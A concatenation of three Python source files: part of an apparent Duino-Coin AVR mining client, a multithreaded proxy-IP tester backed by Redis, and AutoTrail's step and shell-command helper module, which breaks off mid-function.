fg_color = Fore.YELLOW
else:
share_str = get_string("rejected")
fg_color = Fore.RED
with thread_lock():
print(Fore.WHITE + datetime.now().strftime(Style.DIM + "%H:%M:%S ")
+ Fore.WHITE + Style.BRIGHT + Back.MAGENTA + Fore.RESET
+ " avr" + str(id) + " " + Back.RESET
+ fg_color + Settings.PICK + share_str + Fore.RESET
+ str(accept) + "/" + str(accept + reject) + Fore.YELLOW
+ " (" + str(round(accept / (accept + reject) * 100)) + "%)"
+ Style.NORMAL + Fore.RESET
+ " ∙ " + str("%04.1f" % float(computetime)) + "s"
+ Style.NORMAL + " ∙ " + Fore.BLUE + Style.BRIGHT
+ str(total_hashrate) + Fore.RESET + Style.NORMAL
+ Settings.COG + f" diff {diff} ∙ " + Fore.CYAN
+ f"ping {(int(ping))}ms")
def mine_avr(com, threadid, fastest_pool):
global hashrate
start_time = time()
report_shares = 0
while True:
while True:
try:
ser.close()
pretty_print('sys' + port_num(com),
f"Closed COM port {com}", 'success')
sleep(2)
except:
pass
try:
ser = Serial(com, baudrate=int(Settings.BAUDRATE),
timeout=float(Settings.AVR_TIMEOUT))
"""
Sleep after opening the port to make
sure the board resets properly after
receiving the DTR signal
"""
sleep(2)
break
except Exception as e:
pretty_print(
'sys'
+ port_num(com),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ f' (avr connection err: {e})',
'error')
sleep(10)
retry_counter = 0
while True:
try:
if retry_counter > 3:
fastest_pool = Client.fetch_pool()
retry_counter = 0
debug_output(f'Connecting to {fastest_pool}')
s = Client.connect(fastest_pool)
server_version = Client.recv(s, 6)
if threadid == 0:
if float(server_version) <= float(Settings.VER):
pretty_print(
'net0', get_string('connected')
+ Style.NORMAL + Fore.RESET
+ get_string('connected_server')
+ str(server_version) + ")",
'success')
else:
pretty_print(
'sys0', f' Miner is outdated (v{Settings.VER}) -'
+ get_string('server_is_on_version')
+ server_version + Style.NORMAL
+ Fore.RESET + get_string('update_warning'),
'warning')
sleep(10)
Client.send(s, "MOTD")
motd = Client.recv(s, 1024)
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: " + Fore.RESET
+ Style.NORMAL + str(motd),
"success")
break
except Exception as e:
pretty_print('net0', get_string('connecting_error')
+ Style.NORMAL + f' (connection err: {e})',
'error')
retry_counter += 1
sleep(10)
pretty_print('sys' + port_num(com),
get_string('mining_start') + Style.NORMAL + Fore.RESET
+ get_string('mining_algorithm') + str(com) + ')',
'success')
while True:
try:
debug_output(com + ': Requesting job')
Client.send(s, 'JOB'
+ Settings.SEPARATOR
+ str(username)
+ Settings.SEPARATOR
+ 'AVR')
job = Client.recv(s, 128).split(Settings.SEPARATOR)
debug_output(com + f": Received: {job[0]}")
try:
diff = int(job[2])
except:
pretty_print("sys" + port_num(com),
f" Node message: {job[1]}", "warning")
sleep(3)
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
sleep(3)
break
retry_counter = 0
while True:
if retry_counter > 3:
break
try:
debug_output(com + ': Sending job to the board')
ser.write(bytes(str(job[0]
+ Settings.SEPARATOR
+ job[1]
+ Settings.SEPARATOR
+ job[2]
+ Settings.SEPARATOR),
encoding=Settings.ENCODING))
debug_output(com + ': Reading result from the board')
result = ser.read_until(b'\n').decode().strip().split(',')
ser.flush()
if result[0] and result[1]:
_ = int(result[0], 2)
debug_output(com + f': Result: {result[0]}')
break
else:
raise Exception("No data received from AVR")
except Exception as e:
debug_output(com + f': Retrying data read: {e}')
retry_counter += 1
continue
try:
computetime = round(int(result[1], 2) / 1000000, 3)
num_res = int(result[0], 2)
hashrate_t = round(num_res / computetime, 2)
hashrate_mean.append(hashrate_t)
hashrate = mean(hashrate_mean[-5:])
hashrate_list[threadid] = hashrate
except Exception as e:
pretty_print('sys' + port_num(com),
get_string('mining_avr_connection_error')
+ Style.NORMAL + Fore.RESET
+ ' (no response from the board: '
+ f'{e}, please check the connection, '
+ 'port setting or reset the AVR)', 'warning')
break
try:
Client.send(s, str(num_res)
+ Settings.SEPARATOR
+ str(hashrate_t)
+ Settings.SEPARATOR
+ f'Official AVR Miner {Settings.VER}'
+ Settings.SEPARATOR
+ str(rig_identifier)
+ Settings.SEPARATOR
+ str(result[2]))
responsetimetart = now()
feedback = Client.recv(s, 64)
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
diff = get_prefix("", int(diff), 0)
debug_output(com + f': retrieved feedback: {feedback}')
except Exception as e:
pretty_print('net' + port_num(com),
get_string('connecting_error')
+ Style.NORMAL + Fore.RESET
+ f' (err handling result: {e})', 'error')
debug_output(com + f': error parsing response: {e}')
sleep(5)
break
if feedback == 'GOOD':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "accept",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback == 'BLOCK':
shares[0] += 1
printlock.acquire()
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
else:
shares[1] += 1
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
hashrate, uptime)
start_time = time()
def periodic_report(start_time, end_time, shares,
hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3') + get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
uptime = time() - start_time
if uptime <= 59:
return str(round(uptime)) + get_string('uptime_seconds')
elif uptime == 60:
return str(round(uptime // 60)) + get_string('uptime_minute')
elif uptime >= 60:
return str(round(uptime // 60)) + get_string('uptime_minutes')
elif uptime == 3600:
return str(round(uptime // 3600)) + get_string('uptime_hour')
elif uptime >= 3600:
return str(round(uptime // 3600)) + get_string('uptime_hours')
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
Thread(target=mine_avr,
args=(port, threadid,
fastest_pool)).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
Thread(
target=update_rich_presence).start()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
reTestIP.py
|
import redis
from tools.common import test_http_proxy
import threading
def http_task():
# 连接redis数据库
POOL = redis.ConnectionPool(host='127.0.0.1', port=6379)
CONN_REDIS = redis.Redis(connection_pool=POOL)
# 取出一个ip进行测试
# proxy = CONN_REDIS.("freeProxy:AfterVerifyOKhttp")
ip = CONN_REDIS.srandmember("freeProxy:AfterVerifyOKhttp",1)
# 判断redis中ip数量是否为空
if not ip:
return 0
else:
# print("INFO: Get proxy from Redis freeProxy:BeforeVerifyhttp list")
proxy = str(ip[0], encoding="utf-8")
flag = test_http_proxy(proxy)
if flag == True:
# CONN_REDIS.sadd("freeProxy:AfterVerifyOKhttp", proxy)
# print("INFO: Save this Proxy IP in freeProxy:AfterVerifyOKhttp")
with open("pass.txt", "a+") as f:
f.write(proxy + "/n")
print("Pass:", proxy)
else:
# CONN_REDIS.sadd("freeProxy_Bad:AfterVerifyFailhttp", proxy)
# print("INFO: Abandon this Proxy IP!")
with open("fail.txt", "a+") as f:
f.write(proxy + "+/n")
print("Fail:", proxy)
return 1
def loop_test(name):
print("*Start thread task %s" % name)
while True:
result = http_task()
print("\n")
if result == 0:
break
if __name__ == "__main__":
jobs = []
num = 8
for i in range(1, num+1):
name = "Thread-" + str(i)
jobs.append(threading.Thread(target=loop_test, args=(name,)))
# 开启多线程
for t in jobs:
t.start()
for t in jobs:
t.join()
|
step.py
|
"""Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with the
License. A copy of the License is located at
http://aws.amazon.com/apache2.0/
or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and
limitations under the License.
Step and action function helpers
This module defines some helpers that make writing action functions and defining steps very easy.
"""
import shlex
import string
from functools import wraps
from multiprocessing import Process
from multiprocessing import Queue as ProcessQueue
from Queue import Empty as QueueEmpty
from subprocess import Popen, PIPE
from time import sleep
from autotrail.core.dag import Step
def create_conditional_step(action_function, **tags):
"""Factory to create a Step that acts like a guard to a branch.
If this step fails, all subsequent steps in that branch, will be skipped.
Consider the following trail where 'b' is the "conditional" step.
+--> d -->+
+--> b -->| |-->+
| +--> e -->+ |
a -->| |--> f
+--> c --------------- >+
Lets say we want the branch "b" to run only if some condition is matched.
We can consider the step 'b' to be the 'conditional' for this branch, i.e., it should succeed only if the condition
is satisfied. If the condition is not satisfied, it will fail.
Failure of 'b' will have the effect of skipping the progeny i.e., if 'b' fails, steps d and e will be "skipped".
Progeny here is strict i.e., progeny of 'b' are 'd' and 'e' but not 'f' (since 'f' has a parent that is not related
to 'b').
This is done by setting two of the step's attributes:
Step.pause_on_fail = True -- So that the step fails instead of being moved to Step.PAUSE.
Step.skip_progeny_on_failure = True -- So that the progeny are skipped on failure.
Returns:
Step object whose pause_on_fail is False and skip_progeny_on_failure is True.
"""
step = Step(action_function, **tags)
step.pause_on_fail = False
step.skip_progeny_on_failure = True
return step
def _create_arguments_dictionary(parameter_extractors, environment, context):
"""Creates a dictionary of arguments (to pass to an action function) using the parameters and the
parameter_extractor_mapping as a guide and extracts the values from environment and context.
Arguments:
parameter_extractors -- A list of functions used to extract and prepare the parameters.
Each of these functions should:
1. Accept 2 arguments: the TrailEnvironment and context. If there is no context,
None will be passed as an argument.
2. They must return a dictionary whose key is one of the parameters.
The dictionary created from all of the parameter_extractors is then used as kwargs
to the function_or_method. See example usage for more clarity.
environment -- The TrailEnvironment object passed to an action function.
context -- The user-defined context object passed to the action function.
Returns:
A dictionary containing the values retrieved from environment and context using each of the functions from
parameter_extractors.
The dictionary is of the form:
{
'<Parameter>': <Value>,
}
"""
arguments = {}
for parameter_extractor in parameter_extractors:
arguments.update(parameter_extractor(environment, context))
return arguments
def _run_return_handlers(returned, context, return_handlers):
"""Call each function in the return_handlers list by passsing them the returned and context objects.
Arguments:
returned -- The object returned by the function being wrapped using extraction_wrapper.
The type of this object doesn't matter but should be compatible with the behaviour expected by
each of the return_handlers.
context -- The context object.
return_handlers -- A list of return handler functions:
[<Return handler>, ...]
Each of these functions should:
1. Accept 2 arguments: the returned value and the context object.
E.g., lambda retval, context: #code
2. Their return values are not used. However, they can produce side-effects by updating the
context objects.
Each return handler function is called one after the other so that each function can extract one
value from the returned object and update the context object. This allows each of these to be
lambdas in most cases and doesn't require them to be complicated functions.
"""
for return_handler in return_handlers:
return_handler(returned, context)
def extraction_wrapper(function_or_method, parameter_extractors, function=True, return_handlers=None,
return_value_extractor=lambda rval, context: rval,
exception_handlers=None):
"""Action function decorator that replaces the action function with a function that accepts TrailEnvironment and
Context and extracts the values using the provided parameter_extractor_mapping before calling the action function
it decorates.
In reality, this is a function that returns a decorator, which in-turn handles the call to the action function.
Arguments:
function_or_method -- A free-standing function or the method of an object that needs to be wrapped.
Unlike the requirement of a Step, this doesn't have to be the __call__ method but
any method.
function -- Boolean - True represents the object passed as function_or_method is a free-standing
function.
False means the object passed as function_or_method is a method of an object.
Defaults to True. Methods are handled differently because they have a 'self'
argument.
parameter_extractors -- A list of functions used to extract and prepare the parameters for the given
function_or_method.
Each of these functions should:
1. Accept 2 arguments: the TrailEnvironment and context. If there is no context,
None will be passed as an argument.
2. They must return a dictionary whose key is one of the parameters of the given
function_or_method.
The dictionary created from all of the parameter_extractors is then used as kwargs
to the function_or_method. See example usage for more clarity.
return_handlers -- A list of return handler functions:
[<Return handler>, ...]
Each of these functions should:
1. Accept 2 arguments: the returned value and the context object.
E.g., lambda retval, context: #code
2. Their return values are not used. However, they can produce side-effects by
updating the context objects with any method calls.
Each return handler function is called one after the other so that each function
can extract one value from the returned object and update the context object. This
allows each of these to be lambdas in most cases and doesn't require them to be
complicated functions.
return_value_extractor -- A function that accepts returned value and context and returns a value that will be
the final return value of the action function. This return value is returned as a
result of the step running the action function.
Defaults to returning the value returned as-is by using: lambda rval, context: rval
exception_handlers -- A list of tuples containing the exception class and the function that will be called
to handle an exception of that class.
'isinstance' is used to check if the exception class matches and ordering is
respected, so, these need to be ordered in the same "layered" manner as is done in
Python code i.e., a narrow exception hander needs to come before the broader handler
if they are subclassed.
Once a match is found, no subsequent handlers will be checked.
Example form:
[(<Exception class 1>, <Handler function 1>), ...]
The functions associated with the exception class should:
1. Accept 2 arguments: the exception object and the context object.
E.g., lambda e, context: #code
2. Their return values are considered the return value of the step.
If an exception is not found in list, it goes unhandled and it will bubble up,
causing the step to fail.
Returns:
An action function that can be used to construct a Step.
The returned function accepts 2 parameters: TrailEnvironment and context and therefore can be used to create a Step.
Usage:
def example_usage(value, trail_output, default='No'):
# Do something.
return some_value
step_example_usage = Step(extraction_wrapper(
example_usage,
# The parameter extraction functions eventually produce the following dictionary:
# {
# 'value': context.get_value(),
# 'trail_output': environment.output,
# 'default': 'Yes',
# }
# Which are then passed as kwargs to example_usage having the same effect as:
# example_usage(value=context.get_value(), trail_output=environment.output, default='Yes')
parameter_extractors=[
# The 'value' is obtained by calling context.get_value()
lambda env, context: dict(value=context.get_value()),
# The 'trail_output' object is obtained from the TrailEnvironment object passed by AutoTrail.
lambda env, context: dict(trail_output=env.output),
# Supply the keyword argument value='yes' to example_usage function without using either context or
# TrailEnvironment.
lambda env, context: dict(default='Yes'),
],
# Infact, the above can be simplified to the following:
# parameter_extractors=[
# lambda env, context: dict(value=context.get_value(), trail_output=env.output, default='Yes'))
# ],
# Here, cleanup_func will be called if SomeException is raised.
exception_handlers=[(SomeException, lambda e, context: cleanup_func(context.resource))],
# The returned value is stored in the context object using the set_value method.
return_handlers=[lambda rval, context: context.set_value(rval)],
# The final return value is the value returned by example_usage but converted to string.
return_value_extractor=lambda rval, context: str(rval)))
This is helpful when writing action functions and retain a readable signature.
def example_usage(value, trail_output, default='No')
Is more readable than:
def example_usage(environment, context):
Because in the latter case, it is not immediately clear what values are being used.
"""
if return_handlers is None:
return_handlers = []
if exception_handlers is None:
exception_handlers = []
@wraps(function_or_method)
def args_replacing_func(*args):
if function:
# Case where function_or_method is a free-standing function.
environment, context = args
func_call = function_or_method
else:
# Case where function_or_method is bound to an instance of a class.
# 'self' will be passed by Python, and it needs to be passed to the function_or_method.
self, environment, context = args
func_call = lambda **kwargs: function_or_method(self, **kwargs)
arguments = _create_arguments_dictionary(parameter_extractors, environment, context)
try:
returned = func_call(**arguments)
except Exception as e:
for exception_class, exception_handler in exception_handlers:
if isinstance(e, exception_class):
return exception_handler(e, context)
raise
_run_return_handlers(returned, context, return_handlers)
return return_value_extractor(returned, context)
return args_replacing_func
def accepts_context(func):
"""Allows defining an action function that accepts only a context and doesn't accept the TrailEnvironment.
Example:
@accepts_context
def action_function_taking_only_context(context):
# Do something with context
pass
"""
@wraps(func)
def func_accepts_context(trail_env, context):
return func(context)
return func_accepts_context
def accepts_environment(func):
"""Allows defining an action function that accepts only theTrailEnvironment and doesn't accept a context.
Example:
@accepts_environment
def action_function_taking_only_environment(trail_env):
# Do something with trail_env
pass
"""
@wraps(func)
def func_accepts_environment(trail_env, context):
return func(trail_env)
return func_accepts_environment
def accepts_nothing(func):
"""Allows defining an action function that accepts nothing.
It ignores both TrailEnvironment and context.
Example:
@accepts_nothing
def action_function_takes_nothing():
# Do something
pass
"""
@wraps(func)
def func_accepts_nothing(trail_env, context):
return func()
return func_accepts_nothing
class InstructionNotCompletedError(RuntimeError):
"""A run-time exception raised by the Instruction class to indicate that the instruction sent to the user could not
be completed.
When an instruction is sent to the user as a message, (with reply_needed as True), the user is expected to reply to
the message.
A True value means the instruction was completed by the user.
A False value means the instruction could not be completed for whatever reason.
This is raised when the user returns a False value.
"""
pass
class Instruction(object):
"""Provides the skeleton for a Runbook instruction-like action_function.
The class creates an action function that ensures the given instruction is sent to the user.
Arguments:
name -- This is a string that represents the name of the action function.
instruction_function -- This is a function which will be called with the environment and context objects and
should return the instruction (string) that will be sent to the user or None.
Example:
lambda env, context: 'Run the command: /tmp/command_to_run {}'.format(context.value)
If a string is returned by the instruction_function, the string is sent to the user as
an instruction.
If None is returned by the instruction_function, then no instruction is sent. This is useful
for conditional instructions ie., an instruction should be sent based on some context
attribute's value.
reply_needed -- boolean - Changes behaviour as follows:
If True : The action function returns *only* when the user has responded to the message
(marking it done). The reply message needed by this action function is the boolean
True.
False indicates that the instruction could not be completed and the action
function will be considered failed.
If False: The action function doesn't wait for the user's response.
Raises:
AttributeError -- If the context object does not have an attribute required by the template (if any).
Example #1:
# An instruction that needs a reply from the user.
instruction_step = Step(Instruction('instruction_1', 'This is instruction #1.'))
Example #2:
# An instruction that does not need any reply from the user.
instruction_step = Step(Instruction('instruction_1', 'This is instruction #1.', reply_needed=False))
Example #3:
# An instruction that uses templates
instruction_step = Step(Instruction('instruction_1', 'This is a templated instruction: {value}'))
# The attribute 'value' will be extracted from context and applied to the above template.
"""
def __init__(self, name, instruction_function, reply_needed=True):
self.name = name
self.instruction_function = instruction_function
self.reply_needed = reply_needed
def __str__(self):
return str(self.name)
def __call__(self, trail_env, context):
"""This method is the one called when AutoTrail runs this action function (an instance of this class).
It accepts TrailEnvironment and context for compliance and makes no use of context.
Arguments:
trail_env -- An object of type TrailEnvironment. (passed by AutoTrail)
context -- A user defined object passed to AutoTrail during runtime. (passed by AutoTrail)
Returns:
String -- Message expressing success.
Raises InstructionNotCompletedError expresing failure.
"""
message = self.instruction_function(trail_env, context)
if message is None:
return 'No instruction to send.'
if self.reply_needed:
done = trail_env.input(message)
if done is not True:
raise InstructionNotCompletedError('This step could not be completed based on response received.')
else:
return 'Step completed successfully based on response received.'
else:
trail_env.output(message)
return 'Output sent.'
class ShellCommandFailedError(RuntimeError):
"""A run-time exception raised by the ShellCommand class to indicate that the execution of the shell command failed.
When a shell command is run, its failure is identified by:
1. The exit code of the command (as identified by the predicate function provided by the user).
2. The presence of a specific error in STDERR (as identified by the predicate function).
This exception is raised when the command fails due to either of the above reasons.
"""
pass
class ShellCommand(object):
"""Provides the skeleton to run a shell command.
The class creates an action function that runs a shell command and tails its output.
Any output sent to STDOUT or STDERR by the shell command is then comunicated to the user using messages.
Arguments:
name -- This is a string that represents the name of the action function.
command_function -- This is a function which will be called with the environment and context objects and
should return the command (string) that will be run or None.
Example:
lambda env, context: '/tmp/command_to_run --value {}'.format(context.value)
When a string is returned by the command_function, the command is executed.
If None is returned by the command_function, then nothing is executed. This is useful
for conditional execution ie., a command should be run based on some context attribute's
value.
Keyword Arguments:
delay -- This is the delay with which the STDOUT is checked for new output.
Defaults to 1.
is_error_ignorable -- Predicate function that returns True when an error in STDERR can be ignored (not shown to
the user).
Defaults to: Ignore only false values (like blank lines).
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : String -- error message sent to STDERR.
is_error_fatal -- Predicate function that returns True when an error is considered FATAL ie., the action
function should FAIL if this error is encountered in STDERR.
Defaults to: Ignore all. This default option ensures that the action function does not
fail due to the presence of messages in STDERR but due to the exit code of the shell
command since it is quite likely that a command might print any warnings to STDERR
without failing.
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : String -- error message sent to STDERR.
is_exit_code_ignorable -- Predicate function that returns True when the exit code of the shell command can be
ignored and not treated as failure.
Defaults to: Ignore nothing. Any non-zero exit code will cause the action function to
fail.
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : Int -- Exit code of the shell command.
is_output_ignorable -- Predicate function that returns True when a message in STDOUT can be ignored (not shown
to the user). This is useful when the shell command is verbose and not all output needs
to be sent to the user.
Defaults to: Ignore only false values (like blank lines).
Signature of the predicate function:
Return Type: Boolean (True or False)
Arguments : String -- message sent to STDOUT.
Example:
shell_step = Step(ShellCommand('list_files', 'ls -l'))
"""
def __init__(self, name, command_function, delay=1,
is_error_ignorable=lambda x: True if not x else False,
is_error_fatal=lambda x: False,
is_exit_code_ignorable=lambda x: x == 0,
is_output_ignorable=lambda x: True if not x else False):
self.name = name
self.command_function = command_function
self.delay = delay
# Predicate functions
self.is_error_ignorable = is_error_ignorable
self.is_error_fatal = is_error_fatal
self.is_exit_code_ignorable = is_exit_code_ignorable
self.is_output_ignorable = is_output_ignorable
def __str__(self):
return str(self.name)
def send_messages(self, trail_env, prefix, messages):
"""Send messages to the user using TrailEnvironment.output.
Prefixes the messages with the provided prefix and formats them as follows:
[<prefix>] -- <message>
Each message from messages is sent in the above format.
Arguments:
trail_env -- An object of type TrailEnvironment.
prefix -- String that will be prefixed before each message.
Used when messages need to be distinguised between STDOUT and STDERR.
messages -- List of strings.
"""
for message in messages:
trail_env.output('[{0}] -- {1}'.format(prefix, message))
def get_valid_stdout_messages(self, stdout_messages):
"""Reads messages from self.stdout_queue and filters them.
Uses the is_output_ignorable predicate function to filter out messages in STDOUT.
Pre-condition:
self.is_output_ignorable should refer to the predicate function.
Arguments:
stdout_messages -- List of messages read from STDOUT.
Returns:
List of strings -- List of filtered STDOUT messages.
"""
return [message for message in stdout_messages if not self.is_output_ignorable(message)]
def get_valid_stderr_messages(self, stderr_messages):
"""Reads messages from self.stderr_queue and filters them.
Uses the is_error_ignorable predicate function to filter out messages in STDERR.
Pre-condition:
self.is_error_ignorable should refer to the predicate function.
Arguments:
stderr_messages -- List of messages read from STDERR.
Returns:
List of strings -- List of filtered STDERR messages.
"""
return [message for message in stderr_messages if not self.is_error_ignorable(message)]
def get_latest_fatal_error(self, stderr_messages):
"""Returns the last fatal error encountered in stderr_messages.
Fatal errors are identified using the is_error_fatal predicate function.
This method iterates over stderr_messages and returns the last identified fatal error.
Pre-condition:
self.is_error_fatal should refer to the predicate function.
Arguments:
stderr_messages -- List of strings - messages collected from STDERR.
Returns:
string -- Containing the last encountered fatal error.
None -- If no errors were encountered.
"""
fatal_message = None
for error_message in stderr_messages:
if self.is_error_fatal(error_message):
fatal_message = error_message
return fatal_message
def generate_failure_message(self, command, command_process, fatal_error):
"""Generates a user-friendly message in case of failure of the
shell command.
Arguments:
command -- String - The command to be run.
command_process -- A Popen object that refers to the process running the shell command.
fatal_error -- This is either None or a string containing the last known fatal error.
Returns:
string -- A message of the format:
[Command: <command>] -- Failed with exit code: <exit code> STDERR (Last line): <fatal error>
"""
return '[Command: {command}] -- Failed with exit code: {exit_code}, STDERR (Last line): {error}'.format(
command=command, exit_code=command_process.poll(), error=fatal_error)
def generate_success_message(self, command, command_process):
"""Generates a user-friendly message in case of successs of the shell command.
Arguments:
command -- String - The command to be run.
command_process -- A Popen object that refers to the process running the shell command.
Returns:
string -- A message of the format:
[Command: <command>] -- Succeeded with exit code: <exit code>
"""
return '[Command: {command}] -- Succeeded with exit code: {exit_code}.'.format(
command=command, exit_code=command_process.poll())
def was_run_successful(self, command_process, fatal_error):
"""This method returns true if the run of the shell command was successful.
Success or Failure depends on two criteria:
1. If the exit code can be ignored (Default: exit code 0 is ignored.)
2. If no fatal error was encountered (Default: All errors are non-fatal)
This means that by default, if a shell command exits with an exit code of 0,
it is considered successful irrespective of the presence of any messages in STDERR.
Pre-condition:
self.is_exit_code_ignorable should refer to the predicate function.
Arguments:
command_process -- A Popen object that refers to the process running the shell command.
fatal_error -- This is either None or a string containing the last known fatal error.
Returns:
boolean -- True when the run was successful. False otherwise.
"""
exit_code = command_process.poll()
return (self.is_exit_code_ignorable(exit_code) and fatal_error is None)
def __call__(self, trail_env, context):
"""This method is the one called when AutoTrail runs this action function (an instance of this class).
It accepts TrailEnvironment and context for compliance and makes no use of context.
This method contains the business logic and makes use of all the other methods and helper functions to achieve
the following:
1) Notify the user about staring.
2) Run the shell command in a subprocess.
3) Tail the STDOUT and STDERR and filter them as defined by the predicate functions and send them to the user.
4) Based on the predicate functions, determine if the run was successful or failed and notify the user of the
same.
5) Notify AutoTrail about success and failure by either returning or raising AssertionError.
Arguments:
trail_env -- An object of type TrailEnvironment. (passed by AutoTrail)
context -- A user defined object passed to AutoTrail during runtime. (passed by AutoTrail)
Returns:
String -- Message expressing success.
Raises -- ShellCommandFailedError expresing failure.
"""
# Make a command using the provided command template and the values provided in the context (if any).
command = self.command_function(trail_env, context)
if command is None:
return 'No command to run.'
# This contains the last fatal error seen in STDERR. Will remain None if all errors encountered are non fatal.
# See class documentation to understand what fatal errors are.
latest_fatal_error = None
trail_env.output('[Command: {}] -- Starting.'.format(command))
command_process, stdin, stdout, stderr = run_shell_command(command)
# Start listeners, which will asynchronously collect any messages from STDOUT and STDERR and put them into
# queues.
stdout_listener, stdout_queue = create_stream_listener(stdout)
stderr_listener, stderr_queue = create_stream_listener(stderr)
# Start the writer, which will asynchronously collect any messages from the user and write then into STDIN.
# All messages sent by the user are available in trail_env.input_queue.
stdin_writer = create_stream_writer(trail_env.input_queue, stdin)
# Tail the command and asynchronously collect messages in STDOUT and STDERR
for stdout_messages, stderr_messages in tail_command(command_process, stdout_queue, stderr_queue,
delay=self.delay):
# Filter the messages based on user-provided predicate functions.
valid_stdout_messages = self.get_valid_stdout_messages(stdout_messages)
valid_stderr_messages = self.get_valid_stderr_messages(stderr_messages)
# Notify user.
self.send_messages(trail_env, 'STDOUT', valid_stdout_messages)
self.send_messages(trail_env, 'STDERR', valid_stderr_messages)
latest_fatal_error = self.get_latest_fatal_error(valid_stderr_messages)
# Terminate the listeners and writers because they don't have any termination logic in them and need to be
# terminated explicitly.
stdout_listener.terminate()
stderr_listener.terminate()
stdin_writer.terminate()
if self.was_run_successful(command_process, latest_fatal_error):
message = self.generate_success_message(command, command_process)
trail_env.output(message)
return message
else:
message = self.generate_failure_message(command, command_process, latest_fatal_error)
trail_env.output(message)
raise ShellCommandFailedError(message)
def make_simple_templating_function(template):
"""Factory for making a templating function that applies the context object to the given template to create a
string.
Arguments:
template -- Templated string, whose values will be filled at run-time from the passed context.
For example, the templated string:
'ls -l {filename}'
Will result in a string where the {filename} value will be populated by using "context.filename"
attribute of context.
If no context is passed, templating will have no effect.
If no templating is done, context values will have no effect.
Returns:
An templating function that accepts TrailEnvironment and context objects, returning a string.
Usage:
make_simple_templating_function('ls -l {filename}')
Will return a function that accepts TrailEnvironment and context. When called, it will return the string:
'ls -l <filename obtained using getattr(context, "filename")>'
"""
return lambda trail_env, context: apply_object_attributes_to_template(template, context)
def make_context_attribute_based_templating_function(attribute_name, template, expected_value=True, notify_user=True):
"""Factory for making a conditional templating function that:
1. Obtains the attribute_name from the context object by calling getattr(<context>, attribute_name).
2. Compares this value with the expected_value.
3. If the values match, apply the context object to the template and return the string.
4. If the values do not match, do nothing, return None. (Sends a message to the user using TrailEnvironment.output
if notify_user is True)
Arguments:
attribute_name -- string - The attribute's name in the context object, whose value will be used to decide
whether and instruction will be sent to the user or not.
expected_value -- Any comparable object. This value will be compared with the value obtained from context.
Defaults to True.
template -- Templated string, whose values will be filled at run-time from the passed context.
Example:
'ls -l {filename}'
The {filename} value will be populated by using "context.filename" attribute of context.
If no context is passed, templating will have no effect.
If no templating is done, context values will have no effect.
Returns:
An templating function that accepts TrailEnvironment and context objects, returning a string.
Usage:
make_context_attribute_based_templating_function('list_file', 'ls -l {filename}')
Will return a function that accepts TrailEnvironment and context. When called, it will:
1. Extract the 'list_file' attribute from the context.
2. If this value == True, it will return the string:
'ls -l <filename obtained using getattr(context, "filename")>'
Otherwise, it will return None. (And notify the user using TrailEnvironment.output)
"""
def templating_function(trail_env, context):
attribute_value = getattr(context, attribute_name)
if attribute_value == expected_value:
return apply_object_attributes_to_template(template, context)
elif notify_user:
trail_env.output(('Nothing to do since "{attribute_name}" in context has the value: "{value}" and the '
'expected value is: "{expected_value}".').format(
attribute_name=attribute_name, value=attribute_value, expected_value=expected_value))
return templating_function
def apply_object_attributes_to_template(template, value_object):
"""Generate a string from the template by applying values from the given object.
If the template provided is not a template (not have any placeholders), this will not have any effect and template
will be returned unchanged.
If value_object is None, this will not have any effect.
Arguments:
template -- A string that may or may not be templated.
If templated, the placeholders will be populated with values from the attributes of the
value_object.
value_object -- Any object that supports the __dict__ method. Most classes have a __dict__ method that return a
mapping of all the attributes and the associated values.
Returns:
string -- This will be the template, with the values from value_object applied.
"""
# Parse the template and extract the field names.
# We'll use the field names to explicitly look-up attributes in the value_object.
